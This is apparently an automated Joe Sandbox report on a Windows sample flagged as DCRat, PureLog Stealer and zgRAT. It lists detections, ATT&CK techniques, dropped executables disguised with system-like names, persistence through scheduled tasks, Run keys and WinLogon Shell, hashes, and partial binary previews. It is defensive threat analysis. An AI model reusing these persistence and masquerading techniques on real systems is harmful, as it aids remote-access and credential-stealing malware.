Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Queries volume information: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe VolumeInformation
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Queries volume information: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\dllhost.exe VolumeInformation
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Queries volume information: C:\Program Files\Windows Security\BrowserCore\dllhost.exe VolumeInformation

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_006ADF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_006ADF1E

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_0069B146 GetVersionExW,

0_2_0069B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ComwebDriverbroker.exe PID: 3536, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4t8f8F3uT1.exe, type: SAMPLE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.ComwebDriverbroker.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2136314831.0000000004A6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2135696001.0000000006212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2158339900.0000000000F92000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Pictures\smss.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 4t8f8F3uT1.exe, type: SAMPLE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.ComwebDriverbroker.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Pictures\smss.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ComwebDriverbroker.exe PID: 3536, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4t8f8F3uT1.exe, type: SAMPLE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.ComwebDriverbroker.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2136314831.0000000004A6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2135696001.0000000006212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2158339900.0000000000F92000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Pictures\smss.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 4t8f8F3uT1.exe, type: SAMPLE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.4abb6f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4t8f8F3uT1.exe.62606f6.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.ComwebDriverbroker.exe.f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Default\Pictures\smss.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	3 Software Packing	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	133 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4t8f8F3uT1.exe	57%	Virustotal		Browse
4t8f8F3uT1.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
4t8f8F3uT1.exe	100%	Avira	VBS/Runner.VPG
4t8f8F3uT1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat	100%	Avira	BAT/Delbat.C
C:\Users\Default\Pictures\smss.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Windows Security\BrowserCore\dllhost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	100%	Avira	HEUR/AGEN.1323342
C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\Default\Pictures\smss.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Windows\System32\SecurityHealthSystray.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Security\BrowserCore\dllhost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	100%	Joe Sandbox ML
C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\ubytutlp.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\IxkHGSFL.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Security\BrowserCore\dllhost.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\Pictures\smss.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IxkHGSFL.log	8%	ReversingLabs
C:\Users\user\Desktop\aRvfEXBg.log	25%	ReversingLabs
C:\Users\user\Desktop\ubytutlp.log	5%	ReversingLabs
C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label	Link
http://www.osoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000024.00000002.3359890859.0000014AAA703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3445591527.00000193122F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3078434828.0000026A10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3425463860.00000206978A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3440208986.00000260EDED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000024.00000002.2351681023.0000014A9A8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.00000193024A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DE087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000024.00000002.2351681023.0000014A9A8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.00000193024A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DE087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000024.00000002.3359890859.0000014AAA703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3445591527.00000193122F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3078434828.0000026A10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3425463860.00000206978A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3440208986.00000260EDED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000027.00000002.3608464962.0000026A69740000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000002D.00000002.3362957489.000001D058BB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000024.00000002.2351681023.0000014A9A691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.0000019302281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DDE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048B41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ComwebDriverbroker.exe, 00000005.00000002.2229743508.00000000039FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351681023.0000014A9A691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2354578771.0000019302281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2342297275.0000026A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2354432110.0000020687831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2352805230.00000260DDE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2351013203.000001D048B41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.osoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).	powershell.exe, 00000027.00000002.3640207978.0000026A69A97000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000002D.00000002.2351013203.000001D048D68000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580836
Start date and time:	2024-12-26 10:21:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	67
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	4t8f8F3uT1.exe renamed because original name is a hash value
Original Sample Name:	5e8c152d54c2160cd8226d744e30560a.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@75/58@0/0
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 62% Number of executed functions: 148 Number of non-executed functions: 108
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, lopatasovka.ru, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5044 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:22:05	API Interceptor	1x Sleep call for process: dllhost.exe modified
04:22:15	API Interceptor	174x Sleep call for process: powershell.exe modified
10:22:12	Task Scheduler	Run new task: Idle path: "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
10:22:12	Task Scheduler	Run new task: IdleI path: "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
10:22:13	Task Scheduler	Run new task: SIUNRHqHRVexch path: "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
10:22:13	Task Scheduler	Run new task: SIUNRHqHRVexchS path: "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
10:22:13	Task Scheduler	Run new task: smss path: "C:\Users\Default\Pictures\smss.exe"
10:22:13	Task Scheduler	Run new task: smsss path: "C:\Users\Default\Pictures\smss.exe"
10:22:15	Task Scheduler	Run new task: ComwebDriverbroker path: "C:\portcomSurrogateRefSession\ComwebDriverbroker.exe"
10:22:15	Task Scheduler	Run new task: ComwebDriverbrokerC path: "C:\portcomSurrogateRefSession\ComwebDriverbroker.exe"
10:22:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\Users\Default\Pictures\smss.exe"
10:22:16	Task Scheduler	Run new task: dllhost path: "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
10:22:16	Task Scheduler	Run new task: dllhostd path: "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
10:22:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
10:22:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
10:22:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
10:22:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ComwebDriverbroker "C:\portcomSurrogateRefSession\ComwebDriverbroker.exe"
10:22:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\Users\Default\Pictures\smss.exe"
10:23:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
10:23:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
10:23:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
10:23:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ComwebDriverbroker "C:\portcomSurrogateRefSession\ComwebDriverbroker.exe"
10:23:47	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\Users\Default\Pictures\smss.exe"
10:23:56	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
10:24:06	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
10:24:14	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
10:24:23	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ComwebDriverbroker "C:\portcomSurrogateRefSession\ComwebDriverbroker.exe"
10:24:41	Autostart	Run: WinLogon Shell "C:\Users\Default\Pictures\smss.exe"
10:24:50	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.601409765557392
Encrypted:	false
SSDEEP:	3:2e8zBwMUvgan:2pUvV
MD5:	665B85FB91D65E1F1CF2674110A22562
SHA1:	09EDBCAD88571A01DC41BA8CB2F96373441B834E
SHA-256:	5D9007BB94E2B30C114E05C63355B0D4133854BEE2527079B1BF3ADA87A18650
SHA-512:	F672123EFA66127F033703202D19B8985842DFDD5A05D41F45118A2AEDA1709D5A6BF10359AF3956F9132E7C27C433380E0952C416FB13B24AF9ED1174A75A5C
Malicious:	false
Preview:	S4890sVdw5yOC5oi72diqhiU6PFgKE6K

C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1790464
Entropy (8bit):	7.485066925729337
Encrypted:	false
SSDEEP:	24576:Gr9jPHLY0g5fcMpx/mWJXZiz9sFMY5EXzn+O8sU1ISTbhpIcN2RN+fgiPM8whrPU:czLYJTFoK4XznW2ElpI9RXich7h
MD5:	E741574F3B1602BA40508C8EE4E8CD26
SHA1:	4E833F7742AB4A26EDDB60A87EFE74DFC0A849DB
SHA-256:	CA4F177F6257475CE968EF0028C585F038C36CF799BAFC9F08E0519F6D154533
SHA-512:	EF70F73FB3A53CBEB99FE163EC98DCC85D95E4002B579776FF03D87CE767BF87AB412C339CA2065310AC1CAFCB0D126F8E54F2AB1616D977BDC37A331B6F8FCE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................J..........Nh... ........@.. ....................................@..................................h..K....... ............................................................................ ............... ..H............text...TH... ...J.................. ..`.rsrc... ............L..............@....reloc...............P..............@..B................0h......H.......D...................[...tg.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~y...{....9....& ....8....(.... ....~y...{....:....& ....8....(.... ....~y...{j...:....& ....8y......0.......... ........8........E....z...5...................k...8u...r...ps....z8.... ....~y...{....:....& ....8....~....(M... .... .... ....s....~....(Q....... ....8t...8.... ....8e......... ....~y...{....9K...& ....8@...~....9.... ...

C:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.8852365779642604
Encrypted:	false
